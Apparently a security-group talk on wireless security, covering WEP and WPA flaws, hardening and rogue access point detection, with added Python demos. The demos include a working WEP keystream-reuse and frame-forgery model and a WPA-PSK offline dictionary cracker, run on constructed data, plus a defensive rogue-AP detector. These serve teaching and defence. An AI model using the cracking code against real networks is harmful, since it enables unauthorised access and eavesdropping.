Suncoast Security Society
Wireless Types
Wireless Advantages / Disadvantages
Wireless Insecurities – WEP
Wireless Insecurities ‐ WPA
Hardening wireless
Detecting Rouge Wireless
Wireless Intrusion Detection
Demo cracking WEP
Demo cracking WPA
802.11a
5 GHz
~300 ft. range
54 Mb/s
802.11b
2.4 GHz
~300 ft. range
11 Mb/s
802.11g
2.4 GHz
~150 ft. range
54 Mb/s
802.11n
2.4 GHz / 5 GHz
~1200 ft. range
Theoretical 300 Mb/s (burst)
Ranges are open-air vendor figures; indoor range is far shorter and depends on walls and antennas
Advantages
Convenience
Mobility
Productivity
Deployment
Expandability
Cost
Disadvantages
Security
Range
Reliability
Speed
Wired Equivalent Privacy
Part of the original 802.11 standard, meant to prevent eavesdropping and
data tampering
Uses the RC4 stream cipher with a 40- or 104-bit shared key, prefixed for every
frame by a 24-bit initialization vector (IV) that is sent in the clear
WEP Key Recovery
Every frame is encrypted with the same WEP key and a different IV
The IV is only 24 bits (0 - 16,777,215), so a busy AP repeats IVs within hours
A repeated IV means a repeated RC4 keystream: XORing the two frames cancels the
keystream and exposes the XOR of their plaintexts
The cleartext IV combined with RC4's weak-key behaviour also allows statistical
attacks (FMS/KoreK/PTW, as implemented in Aircrack-ng) that recover the WEP key
itself from a few tens of thousands of captured frames
Unauthorized data decryption and data integrity
Once the key is known it can be used to read all traffic and to join the AP itself
The integrity check (ICV) is a plain CRC-32, which is linear, so an encrypted
frame can be modified without the key and its ICV patched to match
Poor key management
Once set, keys remain the same
In a corporate environment people leave and the keys should be changed,
but rarely are
No access point authentication
Authentication works one way only
Clients prove knowledge of the key to the AP (shared-key authentication) but
the client has no way of authenticating the access point, so a rogue AP
holding the same key is indistinguishable from the real one
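The keystream-reuse and CRC-linearity problems described above, as an added example that is not part of the original slides: a small Python model of WEP (RC4 seeded with IV || key, CRC-32 ICV) run over constructed sample frames. It shows that two frames under the same IV leak each other's plaintext once one of them is known, that an encrypted frame can be altered and its ICV patched without the key, and how few frames the 24-bit IV space survives. The key, IV and frame contents are made up for the example; the RC4 and CRC handling is the real WEP construction, but the framing is simplified (no 802.11 header, no key-ID byte).

```python
import math
import zlib

IV_SPACE = 2 ** 24  # the WEP IV is 24 bits: 16,777,216 values, then it must repeat


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP seeds it with IV || shared key for every frame."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Simplified frame body: cleartext 3-byte IV || RC4(IV||key) over (plaintext || CRC-32 ICV).
    Real frames also carry the 802.11 header and a key-ID byte; omitted here."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    body = plaintext + icv
    return iv + xor(body, rc4_keystream(iv + wep_key, len(body)))


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Return (plaintext, icv_ok) for a frame made by wep_encrypt."""
    iv, body = frame[:3], frame[3:]
    clear = xor(body, rc4_keystream(iv + wep_key, len(body)))
    data, icv = clear[:-4], clear[-4:]
    return data, zlib.crc32(data).to_bytes(4, "little") == icv


def recover_via_iv_reuse(frame_a: bytes, frame_b: bytes, known_plaintext_a: bytes) -> bytes:
    """Two frames under one IV share the RC4 keystream, so C_a ^ C_b = P_a ^ P_b.
    Knowing P_a (e.g. a packet the attacker sent to the victim from the Internet) exposes
    that many keystream bytes, which decrypt the same number of bytes of P_b. No key needed."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames must share an IV")
    keystream = xor(frame_a[3:], known_plaintext_a)
    return xor(frame_b[3:], keystream)


def flip_bits(frame: bytes, offset: int, delta: bytes) -> bytes:
    """Modify an encrypted frame without the key. CRC-32 is linear over XOR:
    crc(m ^ d) = crc(m) ^ crc(d) ^ crc(zeros), so the encrypted ICV can be patched blind."""
    body = frame[3:]
    data_len = len(body) - 4
    d = bytearray(data_len)
    d[offset:offset + len(delta)] = delta
    icv_delta = (zlib.crc32(bytes(d)) ^ zlib.crc32(bytes(data_len))).to_bytes(4, "little")
    return frame[:3] + xor(body, bytes(d) + icv_delta)


def frames_for_iv_collision(probability: float) -> float:
    """Birthday bound: frames a sniffer needs before two carry the same random IV with the
    given probability. Drivers that count IVs sequentially simply wrap after 2^24 frames."""
    return math.sqrt(2 * IV_SPACE * math.log(1 / (1 - probability)))


# Constructed sample data (not a capture): a 40-bit key, one IV, two frame payloads.
WEP_KEY = bytes.fromhex("0123456789")
IV = bytes.fromhex("000001")
LLC_SNAP = bytes.fromhex("aaaa03000000")
# Frame A: an IP packet the attacker knows in full (IP checksum left zero; constructed).
P_A = LLC_SNAP + bytes.fromhex("0800") + bytes.fromhex("4500001c00010000400100000a0000010a000002") + bytes(8)
# Frame B: a victim's ARP request, which the attacker should not be able to read.
P_B = LLC_SNAP + bytes.fromhex("0806") + bytes.fromhex("0001080006040001")


def demo():
    frame_a = wep_encrypt(WEP_KEY, IV, P_A)
    frame_b = wep_encrypt(WEP_KEY, IV, P_B)  # same IV as frame_a: the flaw being exploited
    leaked_b = recover_via_iv_reuse(frame_a, frame_b, P_A)[:len(P_B)]
    # Flip one bit in frame A's destination IP (byte 27: 10.0.0.2 -> 10.0.0.3) without the key.
    tampered_a = flip_bits(frame_a, 27, b"\x01")
    data, icv_ok = wep_decrypt(WEP_KEY, tampered_a)
    return leaked_b, data, icv_ok


if __name__ == "__main__":
    leaked, data, ok = demo()
    print("victim frame read via IV reuse:", leaked.hex())
    print("tampered frame passes ICV:", ok, "- dst now", ".".join(str(b) for b in data[24:28]))
    print("frames for a 50% chance of an IV collision:", round(frames_for_iv_collision(0.5)))
```

The bit-flip is the part most people miss: the AP accepts the tampered frame because the ICV still matches, so WEP gives neither confidentiality nor integrity even before the key is recovered.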
Wi-Fi Protected Access
WPA was the Wi-Fi Alliance's interim subset of draft 802.11i; WPA2 implements
the ratified 802.11i standard
Replaced WEP's static-key RC4 with:
TKIP (Temporal Key Integrity Protocol): still RC4 underneath, but with per-packet
key mixing, a 48-bit sequence counter and the Michael MIC (WPA), and/or
AES-CCMP (Advanced Encryption Standard in counter mode with CBC-MAC), the
mandatory cipher in WPA2
Uses a 4-way handshake to derive fresh per-session (pairwise) keys from the
master key and to confirm that both sides hold it
Poor key management (WPA-PSK)
A single pre-shared passphrase is shared by every user and device; once set it
remains the same
In a corporate environment people leave and the passphrase should be changed,
but rarely is
The passphrase is the only secret in the handshake, so anyone who captures one
4-way handshake can run an offline dictionary attack against it
No access point authentication (WPA-PSK)
The handshake proves only possession of the shared passphrase, not who the AP is
Anyone holding the passphrase (every user on the network) can stand up an AP
that passes the handshake, so
a client cannot tell a legitimate AP from a rogue one; only 802.1X/EAP with
server certificate validation gives the client an AP it can verify
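The 4-way handshake and the offline dictionary attack on WPA-PSK, as an added example rather than anything from the original slides or the "Demo cracking WPA" session: Python that derives the PMK (PBKDF2) and PTK (the 802.11i PRF), then checks each guessed passphrase against the Key MIC of a captured message 2, which is the same computation Aircrack-ng performs. The SSID, MAC addresses, nonces, wordlist and EAPOL-Key frame are constructed for the example (the frame layout is the real EAPOL-Key layout; the values do not come from any capture). It also shows why the later advice to use a long non-dictionary passphrase matters: the attack can only succeed if the passphrase is in the list.

```python
import hashlib
import hmac

MIC_OFFSET = 81  # Key MIC field starts 81 bytes into an EAPOL-Key frame (4-byte EAPOL header + 77)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    The SSID is the only salt, so the cost of a guess depends only on the 4096 rounds."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, aa, spa, anonce, snonce, length=64) -> bytes:
    """802.11i PRF-X: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    Both MACs and both nonces cross the air in the clear; only the PMK is secret.
    The first 16 bytes of the PTK are the KCK that signs the handshake messages."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:length]


def eapol_mic(kck: bytes, frame_mic_zeroed: bytes, descriptor_version: int) -> bytes:
    """Key MIC over the whole EAPOL-Key frame with the MIC field zeroed:
    HMAC-MD5 for descriptor version 1 (TKIP), HMAC-SHA1 truncated to 16 bytes for version 2 (CCMP)."""
    if descriptor_version == 1:
        return hmac.new(kck, frame_mic_zeroed, hashlib.md5).digest()
    return hmac.new(kck, frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, rsn_ie: bytes, descriptor_version: int = 2) -> bytes:
    """Handshake message 2 (supplicant -> AP) with its MIC field still zero. The field
    layout is the real EAPOL-Key layout; the field values are constructed for this example."""
    key_info = (0x0108 | descriptor_version).to_bytes(2, "big")  # Pairwise + MIC bits + version
    body = (b"\x02" + key_info + b"\x00\x10" + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16)  # key IV, key RSC, key ID, MIC
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X version 1, type EAPOL-Key


def supplicant_sign(passphrase, ssid, aa, spa, anonce, snonce, msg2_zeroed) -> bytes:
    """What the legitimate client does: compute the MIC with the real KCK and fill it in."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce, 16)
    mic = eapol_mic(kck, msg2_zeroed, msg2_zeroed[6] & 0x07)
    return msg2_zeroed[:MIC_OFFSET] + mic + msg2_zeroed[MIC_OFFSET + 16:]


def crack_psk(ssid, aa, spa, anonce, snonce, captured_msg2, wordlist):
    """Offline dictionary attack on one captured handshake: recompute the MIC for each guess.
    Returns the passphrase if it is in the wordlist, else None. Nothing is sent to the network."""
    mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = captured_msg2[:MIC_OFFSET] + bytes(16) + captured_msg2[MIC_OFFSET + 16:]
    version = captured_msg2[6] & 0x07  # low 3 bits of Key Information
    for guess in wordlist:
        kck = derive_ptk(pmk_from_passphrase(guess, ssid), aa, spa, anonce, snonce, 16)
        if hmac.compare_digest(eapol_mic(kck, zeroed, version), mic):
            return guess
    return None


# Constructed handshake parameters (not from any capture).
SSID = "SuncoastDemo"
AA = bytes.fromhex("001122334455")   # AP (authenticator) MAC
SPA = bytes.fromhex("66778899aabb")  # client (supplicant) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/CCMP/PSK
WORDLIST = ["password", "letmein", "suncoast2008", "dragon"]


def demo(passphrase: str):
    """Simulate a client joining with `passphrase`, capture its message 2, attack it."""
    captured = supplicant_sign(passphrase, SSID, AA, SPA, ANONCE, SNONCE, build_msg2(SNONCE, RSN_IE))
    return crack_psk(SSID, AA, SPA, ANONCE, SNONCE, captured, WORDLIST)


if __name__ == "__main__":
    print("weak passphrase recovered:", demo("suncoast2008"))
    print("long random passphrase recovered:", demo("Tq7#mV-kLp2!xR9wZ4bN"))
```

Note what the attacker never needs: association with the AP, a second handshake, or any traffic after the capture. Each guess costs one PBKDF2 run, and because the SSID is the salt, rainbow tables exist for common SSIDs; an unusual SSID and a long random passphrase are the only things that make the search infeasible on a PSK network.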
Don't use wireless, if possible
Use a layered approach
MAC address filter (weak on its own: client MACs are visible in the clear and
trivially spoofed)
Turn off SSID broadcast (weak on its own: the SSID still appears in probe and
association frames)
Don't allow the AP to issue IP addresses
Only allow access during certain times
Use WPA2 with a long, non-dictionary passphrase (home)
Use WPA2 with 802.1X port-based authentication against a RADIUS server (enterprise)
Turn off auto-connect to preferred networks on clients (Karma and Hotspotter
answer any probe request and impersonate those networks)
Establish a VPN connection from the wireless segment to your office network,
treating the WLAN as untrusted
Use "Fake AP" to flood the air with bogus beacon frames (some 53,000 fake APs)
so the real AP is hidden in the noise
Apply RF shielding to the building (e.g. signal-attenuating paint) so the
signal does not leak outside
Set up wireless intrusion detection
Implement a wireless security policy
Provide for physical security of APs and wiring closets
Provide a supported WLAN infrastructure so staff have no reason to plug in their own AP
Implement 802.1X port-based authentication on your switches so an AP plugged
into a wall jack gets no network
Limit the number of MAC addresses per port to one with port security (port
security must be enabled on the port; the default violation mode shuts the port
down when a second MAC appears)
SW2(config-if)# switchport port-security maximum 1
Scan with a wireless client (a laptop running Netstumbler or Kismet)
You have to be within range of the rogue AP
Hard to spot if it is not broadcasting its SSID (a passive sniffer such as
Kismet still sees its beacons and client traffic)
Hard to manage at remote sites
Tools
Airdefense – www.airdefense.net
Airmagnet – www.airmagnet.com
Netstumbler – www.netstumbler.com
Kismet – www.kismetwireless.net
Detecting from the wired side is much harder: you rely on the footprint the
AP leaves on the network rather than on outright detection.
Look for things like:
Multiple MAC addresses behind one switch port (a bridging AP; a NAT-mode AP
shows only its own MAC)
Larger than normal bandwidth usage on a port
Packet analysis showing anomalies (TTL one hop lower than expected, unfamiliar
OS fingerprints, AP management traffic)
Unusual DHCP entries (consumer-router hostnames, unknown vendor OUIs)
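The wired-side checks listed above, as an added example (not code from the original slides): Python that parses constructed Cisco `show mac address-table` output and ISC dhcpd log lines, combines them with per-port rate figures, and flags ports whose footprint looks like an AP. The sample data, the hostname hint list and the 10 Mbit/s threshold are assumptions for the example; tune them to your own baseline.

```python
import re
from collections import defaultdict

# Constructed sample of Cisco `show mac address-table dynamic` output; not a real capture.
MAC_TABLE = """\
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
  10    0011.2233.4455    DYNAMIC     Gi0/1
  10    0011.2233.4456    DYNAMIC     Gi0/2
  10    0011.2233.4457    DYNAMIC     Gi0/5
  10    0011.2233.4458    DYNAMIC     Gi0/5
  10    0011.2233.4459    DYNAMIC     Gi0/5
  10    0011.2233.445a    DYNAMIC     Gi0/7
"""

# Constructed ISC dhcpd-style syslog lines; addresses and hostnames are invented.
DHCP_LOG = """\
DHCPACK on 10.0.10.21 to 00:11:22:33:44:55 (DESKTOP-ACCT01) via eth0
DHCPACK on 10.0.10.22 to 00:11:22:33:44:56 (DESKTOP-ACCT02) via eth0
DHCPACK on 10.0.10.30 to 00:11:22:33:44:57 (linksys) via eth0
DHCPACK on 10.0.10.31 to 00:11:22:33:44:58 (iPhone) via eth0
DHCPACK on 10.0.10.32 to 00:11:22:33:44:59 (android-3f2a) via eth0
DHCPACK on 10.0.10.40 to 00:11:22:33:44:5a (WRT54G) via eth0
"""

# Constructed 5-minute input rate per port in Mbit/s (e.g. from SNMP ifInOctets deltas).
PORT_RATE_MBPS = {"Gi0/1": 0.8, "Gi0/2": 1.1, "Gi0/5": 3.0, "Gi0/7": 28.5}

# Assumption: substrings typical of consumer AP/router default hostnames. Tune for your site.
AP_HOSTNAME_HINTS = ("linksys", "wrt", "dlink", "netgear", "airport", "tp-link")

MAC_ROW = re.compile(r"^\s*(\d+)\s+([0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+\S+\s+(\S+)", re.I)
DHCP_ROW = re.compile(r"DHCPACK on (\S+) to ([0-9a-f:]{17}) \(([^)]*)\)", re.I)


def normalize_mac(mac: str) -> str:
    """Turn 0011.2233.4455 / 00:11:22:33:44:55 / 00-11-22-33-44-55 into lowercase colon form."""
    digits = re.sub(r"[^0-9a-f]", "", mac.lower())
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def parse_mac_table(text: str) -> dict:
    """Map switch port -> set of MACs learned on it."""
    macs_by_port = defaultdict(set)
    for line in text.splitlines():
        m = MAC_ROW.match(line)
        if m:
            macs_by_port[m.group(3)].add(normalize_mac(m.group(2)))
    return macs_by_port


def parse_dhcp_log(text: str) -> dict:
    """Map MAC -> hostname the client offered in its DHCP request."""
    host_by_mac = {}
    for line in text.splitlines():
        m = DHCP_ROW.search(line)
        if m:
            host_by_mac[normalize_mac(m.group(2))] = m.group(3)
    return host_by_mac


def find_rogue_candidates(macs_by_port, host_by_mac, rate_mbps, max_macs=1, rate_threshold=10.0):
    """Flag ports whose wired footprint looks like an AP. Returns {port: [reasons]}.
    A bridging AP exposes every wireless client's MAC on one port; a NAT-mode AP hides
    them behind its own MAC, so the hostname and bandwidth checks are what catch it."""
    findings = defaultdict(list)
    for port, macs in macs_by_port.items():
        if len(macs) > max_macs:
            findings[port].append(f"{len(macs)} MACs on one port (expected at most {max_macs})")
        for mac in sorted(macs):
            host = host_by_mac.get(mac, "")
            if any(hint in host.lower() for hint in AP_HOSTNAME_HINTS):
                findings[port].append(f"DHCP hostname '{host}' for {mac} looks like a consumer AP")
        if rate_mbps.get(port, 0.0) > rate_threshold:
            findings[port].append(f"{rate_mbps[port]} Mbit/s sustained, above the {rate_threshold} Mbit/s baseline")
    return dict(findings)


def demo() -> dict:
    return find_rogue_candidates(parse_mac_table(MAC_TABLE), parse_dhcp_log(DHCP_LOG), PORT_RATE_MBPS)


if __name__ == "__main__":
    for port, reasons in sorted(demo().items()):
        print(port)
        for reason in reasons:
            print("  -", reason)
```

In the sample, Gi0/5 is caught by the MAC count (a bridging AP), while Gi0/7 carries a single MAC and is only caught by its DHCP hostname and its bandwidth: that is the NAT-mode case the one-MAC-per-port rule misses, which is why several weak signals are combined rather than relying on any one of them.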
Issues / Problems
Hard to tell which traffic is aimed at your network and which is just nearby
True detection only happens after the packets have passed through your AP or switch
The infrastructure is put together to support connectivity, not intrusion detection
Little to no vendor support for this type of detection
Arpwatch (alerts on new MAC/IP pairings) – http://www-nrg.ee.lbl.gov
Tools that do OS fingerprinting
Nmap – www.insecure.org
Xprobe – http://sys-security.com/blog/xprobe2/
Nessus – www.nessus.org
http://www.intel.com/standards/case/case_802_11.htm
Unwanted Wireless Signals Bounce Off This Paint - http://www.informationweek.com/news/mobility/showArticle.jhtml?articleID=198001494
WLAN Key Generator - http://darkvoice.dyndns.org/wlankeygen/
Wireless Security: Why WPA2 is better than WPA - http://www.thegeekpub.com/Home/ArticleView/tabid/59/selectmoduleid/399/ArticleID/64/reftab/65/Default.aspx
WPA PSK Crackers: Loose Lips Sink Ships - http://www.wi-fiplanet.com/tutorials/article.php/3667586
SANS Reading Room - http://www.sans.org
Aircrack-ng - http://www.aircrack-ng.org/
aireplay-ng (packet injection and replay) - http://www.wirelessdefence.org/Contents/Aircrack_aireplay.htm
AirSnort - http://airsnort.shmoo.com/
FakeAP - http://www.blackalchemy.to/project/fakeap/
Hotspotter - http://www.remote-exploit.org/codes_hotspotter.html
Karma - http://theta44.org/karma/index.html
MacChanger - http://alobbs.com/macchanger/